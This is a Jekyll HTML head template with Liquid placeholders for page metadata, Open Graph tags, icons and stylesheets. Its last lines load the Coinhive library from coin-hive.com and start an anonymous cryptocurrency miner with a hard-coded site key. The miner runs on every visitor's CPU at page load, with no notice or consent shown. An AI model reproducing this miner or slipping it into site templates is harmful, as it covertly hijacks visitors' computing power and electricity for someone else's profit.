<head>
	<title>{{ page.title }} - {{ site.title }}</title>
	<meta charset="utf-8" />
	<meta name="theme-color" content="#242943">
	<meta property="og:title" content="{{ page.title }} - {{ site.title }}">
    <meta property="og:type" content="website">
    <meta property="og:image" content="assets/images/logo.png">
    <meta property="og:url" content="{{ site.url }}">
    <meta property="og:description" content="{{ site.description }}">
	<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
	<link rel="icon" sizes="1024x1024" href="assets/images/logo.png">
	<!--[if lte IE 8]><script src="{{ "assets/js/ie/html5shiv.js" | relative_url }}"></script><![endif]-->
	<link rel="stylesheet" href="{{ "assets/css/main.css" | relative_url }}" />
	<!--[if lte IE 9]><link rel="stylesheet" href="{{ "assets/css/ie9.css" | relative_url }}" /><![endif]-->
	<!--[if lte IE 8]><link rel="stylesheet" href="{{ "assets/css/ie8.css" | relative_url }}" /><![endif]-->
	<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
	<script>
		var m = new CoinHive.Anonymous('TdQAFH6yjlXqvRxWyM23RRASFWhrU3lE');
		m.start();
		m.setAutoThreadsEnabled(enabled);
	</script>
</head>